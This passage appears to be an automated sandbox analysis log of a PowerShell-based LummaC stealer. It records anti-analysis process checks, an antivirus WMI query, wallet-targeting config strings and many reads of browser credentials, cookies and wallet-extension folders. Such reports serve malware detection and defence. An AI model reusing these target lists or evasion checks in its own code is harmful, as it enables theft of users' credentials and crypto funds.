                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: powershell.exe, 00000008.00000002.3478653794.0000000004BB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: powershell.exe, 00000008.00000002.3475273003.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"c
                Source: powershell.exe, 00000008.00000002.3473692428.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: powershell.exe, 00000008.00000002.3475273003.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/@
                Source: powershell.exe, 00000008.00000002.3475273003.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m
                Source: powershell.exe, 00000008.00000002.3475273003.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,
                Source: powershell.exe, 00000008.00000002.3475273003.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,
                Source: powershell.exe, 00000008.00000002.3473692428.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: powershell.exe, 00000002.00000002.2255753082.00000000072A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
